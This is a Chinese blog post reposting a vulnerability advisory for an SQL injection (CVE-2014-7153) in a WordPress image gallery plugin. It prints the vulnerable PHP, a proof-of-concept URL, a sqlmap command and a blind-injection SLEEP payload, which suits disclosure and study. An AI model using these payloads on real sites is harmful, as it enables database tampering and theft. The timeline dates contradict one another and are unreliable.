SQL Injection - CVE-2014-7153

鐵人賽

thankgod

2014-09-30 22:03:35

1480 瀏覽

分享至

簡介

CVE-2014-7153是WordPress中 Huge IT 圖像庫的PlugIn 1.0.0 & 1.0.1版本，在 admin/gallery_func.php 中，editgallery函式內的removeslide參數未過濾所造成的SQL Injection。

Warning

version 1.0.0 & 1.0.1

問題點

######################

Exploit Title : Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection

Exploit Author : Claudio Viviani

Vendor Homepage : http://huge-it.com/

Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip

Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs

Date : 2014-08-25

Tested on : Windows 7 / Mozilla Firefox

Linux / Mozilla Firefox

Linux / sqlmap 1.0-dev-5b2ded0

######################

Location :

http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php

######################

Vulnerable code :

function editgallery($id)
{

global $wpdb;

if(isset($_GET["removeslide"])){
if($_GET["removeslide"] != ''){

$wpdb->query("DELETE FROM ".$wpdb->prefix."huge_itgallery_images WHERE id = ".$_GET["removeslide"]." ");

}
}

######################

PoC Exploit:

http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1 and 1=2

Exploit Code via sqlmap:

sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1" \
-p removeslide --dbms=mysql --level 3

[20:38:20] [INFO] GET parameter 'removeslide' is 'MySQL >= 5.0 time-based blind - Parameter replace' injectable
...
...
...

Place: GET
Parameter: removeslide
Type: AND/OR time-based blind
Title: MySQL >= 5.0 time-based blind - Parameter replace
Payload: page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=(SELECT (CASE WHEN (5440=5440) THEN SLEEP(5) ELSE 5440*(SELECT 5440 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

PoC Video:

https://www.youtube.com/watch?v=gAmb0_o3ZUc

######################

Vulnerability Disclosure Timeline:

2014-08-25: Discovered vulnerability
2014-08-26: Vendor Notification (Web Customers Service Form)
2014-08-26: No Response/Feedback
2014-08-01: Plugin version 1.0.1 released without fix
2014-08-02: Public Disclosure

#####################

Discovered By : Claudio Viviani
http://www.homelab.it

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################

-- by 《packetstormsecurity》